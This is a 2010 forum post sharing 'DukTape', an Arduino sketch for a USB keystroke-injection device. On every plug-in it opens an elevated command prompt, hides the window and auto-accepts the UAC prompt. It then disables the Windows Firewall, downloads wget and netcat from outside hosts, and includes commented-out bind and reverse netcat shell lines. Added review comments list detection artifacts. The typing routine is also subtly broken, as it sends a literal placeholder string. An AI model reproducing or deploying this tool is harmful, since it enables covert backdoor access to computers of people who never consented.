str33ts0ld13r Posted July 31, 2010 Share Posted July 31, 2010 (edited)

Greetings ducky lovers! I'm very excited to finally be making a contribution to the rubber ducky project. To get started you will need arduino and the phukdlib. DukTape is nothing fancy (pun intended). It will get you wget and a few other toys like nc, then it opens a back door for you to get in. When complete it blinks (big surprise right!! haha)

There is MUCH room for improvement on this, but I sadly haven't had time to work on it as much as I would like. Anyway, I wanted to share what I have put together so far. Please feel free to modify, add, or change whatever you like in this code. All that I ask is that you post your changes for the rest of the ducky community. As always, constructive criticism is welcome and appreciated.

Warning: I have NOT had a chance to test this code with my teensy yet (had some hardware failure on my test boxes :( ). But it compiles fine for me.

Warning2: I haven't set up a kill switch feature yet to keep it from running on systems you don't want it to (i.e. your own system). So you have been warned, it runs every time you plug it in!

UPDATE: I just added a UAC handler and changed the way the cmd is launched to go through the start menu using the ctrl and esc keys. (Thanks H@L0_F00 for the ctrl esc combo you posted, and thanks Jonny_Walked, I used some of the code you posted, the UAC handler, and used your cmd launcher.) (If this code was Benownzu93's, I thank you.) Also, the PHUCKED lib is no longer needed with the updated cmd launcher.

/*
################################
###########DukTape##############
################################
Readme:
To use DukTape make sure you have the phukdlib installed in arduino.
I would like to thank everyone on the Rubber Ducky forums http://www.hak5.org/forums/index.php?showforum=56 who I borrowed ideas and code from.
Debug is done through the serial monitor. To disable it comment out/remove the code marked as debug (ie.. //debug).
Delays may need to be adjusted... */

// NOTE(review): host-side artifacts visible in this sketch, useful as detection points:
//   - a "winduk" directory created under %systemroot%
//   - "netsh firewall set opmode disable" entered at the command prompt opened by CMD()
//   - ftp.exe driven by a script file (ftp -s:ftpcmd.txt), and wget/unzip/nc binaries
//     fetched from third-party hosts over plain FTP/HTTP
//   - keystrokes arriving from a USB keyboard device about five seconds after plug-in

int ledPin = 11; // pin driving the LED that loop() blinks

/*
 * Runs once at power-up: waits 5 s, then issues the keystroke sequence below and
 * reports progress on the serial monitor. Nothing here checks which host the
 * device is attached to; the sequence starts on every plug-in.
 */
void setup() {
  delay(5000); //initial delay
  pinMode(ledPin, OUTPUT);
  Serial.begin(9600); //debug
  delay(200); //debug
  Serial.println("START");//debug

  //start cmd hidden
  CMD();
  delay(1000);
  MoveWin();

  //prepare work area
  TypeCmd("mkdir %systemroot%\\winduk");
  TypeCmd("cd %systemroot%\\winduk");
  // NOTE(review): this turns the Windows Firewall off for the whole host, not
  // just for this tool; it is a high-signal command line for process logging.
  TypeCmd("netsh firewall set opmode disable");//kill firewall

  //ftp download wget
  // The four echo lines build an ftp script file (ftpcmd.txt) in the work area.
  TypeCmd("echo bin >>ftpcmd.txt");
  TypeCmd("echo cd /tex-archive/systems/texlive/tlnet/tlpkg/installer/wget/ >>ftpcmd.txt");
  TypeCmd("echo get wget.exe >>ftpcmd.txt");
  TypeCmd("echo quit >>ftpcmd.txt");
  TypeCmd("ftp -A -v -s:ftpcmd.txt cam.ctan.org"); //run ftp download
  delay(6000);
  TypeCmd("if NOT exist wget.exe ftp -A -v -s:ftpcmd.txt cam.ctan.org");//error recovery in case of wget download fail
  Serial.println("Ftp completed");//debug

  //Get more tools
  // Each step is guarded by "if NOT exist", so a file already present is not fetched again.
  TypeCmd("if NOT exist unzip.exe wget -q http://stahlworks.com/dev/unzip.exe"); //get unzip
  TypeCmd("if NOT exist nircmd.zip wget -q http://www.nirsoft.net/utils/nircmd.zip");//get nircmd
  TypeCmd("if NOT exist nircmdc.exe unzip.exe -qq nircmd.zip"); //unzip nircmd
  TypeCmd("if NOT exist nc111nt.zip wget -q http://joncraton.org/media/files/nc111nt.zip"); //get netcat
  TypeCmd("if NOT exist nc.exe unzip.exe -qq nc111nt.zip nc.exe");//unzip netcat

  //Payload
  // Both payload lines below are commented out in the posted version, so setup()
  // as written only stages the tools listed above.
  //TypeCmd("nc -l -p 1337 -d -e cmd.exe");//netcat listens on port leet and launches cmd when a connection is established
  /*TypeCmd("nc -d IP PORT -e cmd.exe");/*reverse netcat replace IP with your ipaddress and replace PORT with the port you use on the system you want to connect back to, run "nc -l -p PORT" without the quotes on your system to accept the reverse connection*/

  //clean up
  // Deletes the two zip archives and the ftp script; the executables fetched
  // above are not deleted and remain in the work area.
  TypeCmd("if Exist nircmdc.exe del /Q nircmd.zip");
  TypeCmd("if EXIST ftpcmd.txt del /Q ftpcmd.txt");
  TypeCmd("if EXIST nc111nt.zip del /Q nc111nt.zip");
  TypeCmd("exit");//close cmd.
  Serial.println("ALL DONE!");//debug
}

/* Blinks the LED on ledPin, 500 ms on and 500 ms off, for as long as the board is powered. */
void loop() {
  digitalWrite(ledPin, HIGH);// LED on
  delay(500);
  digitalWrite(ledPin, LOW);// LED off
  delay(500);
}

/* Presses and releases the Enter key, then waits 100 ms. */
void Enter() {
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0); // clear the key slot so the next report releases the key
  Keyboard.send_now();
  delay(100);
}

/*
 * Sends one line of keystrokes with Keyboard.println, waits 200 ms, presses
 * Enter via Enter(), waits 2 s, then writes a line to the serial monitor.
 * commandtotype: command-line text supplied by the caller.
 */
void TypeCmd(char *commandtotype) { //must have cmd prompt open to work
  Keyboard.println("*commandtotype");
  delay(200);
  Enter();
  delay(2000);//Execution delay
  Serial.println("*commandtotype");//debug
}

/*
 * Sends Alt together with Space and M, releases them, then presses the Up arrow
 * 200 times (100 ms apart, roughly 20 s in total) and finishes with Enter.
 * NOTE(review): presumably this picks "Move" from the window menu and pushes the
 * console window off the top of the screen (the caller labels it "start cmd
 * hidden"); confirm on a test host.
 */
void MoveWin() {
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.set_key2(KEY_M);
  Keyboard.send_now();
  delay(50);
  Keyboard.set_modifier(0); // release modifier and both key slots
  Keyboard.set_key1(0);
  Keyboard.set_key2(0);
  Keyboard.send_now();
  delay(50);
  for(int x=0; x<200; ++x){
    Keyboard.set_key1(KEY_UP);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(100);
  }
  Enter();
}

/*
 * Sends Alt+Y, holds it for 100 ms, then releases.
 * NOTE(review): presumably this answers "Yes" on the UAC consent dialog; it is
 * sent blind, with no check that a dialog is actually showing.
 */
void UAC() {
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_Y);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

/*
 * Sends Ctrl+Esc, types "cmd", waits 1 s, sends Ctrl+Shift+Enter, waits 2 s,
 * then calls UAC().
 * NOTE(review): Ctrl+Esc opens the Start menu and Ctrl+Shift+Enter there requests
 * an elevated launch, which is why UAC() follows; the fixed delays assume the
 * host responds in time.
 */
void CMD() {
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.set_key1(KEY_ESC);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print("cmd");
  delay(1000);
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(2000);
  UAC();
}
Edited August 3, 2010 by str33ts0ld13r Quote Link to comment Share on other sites More sharing options...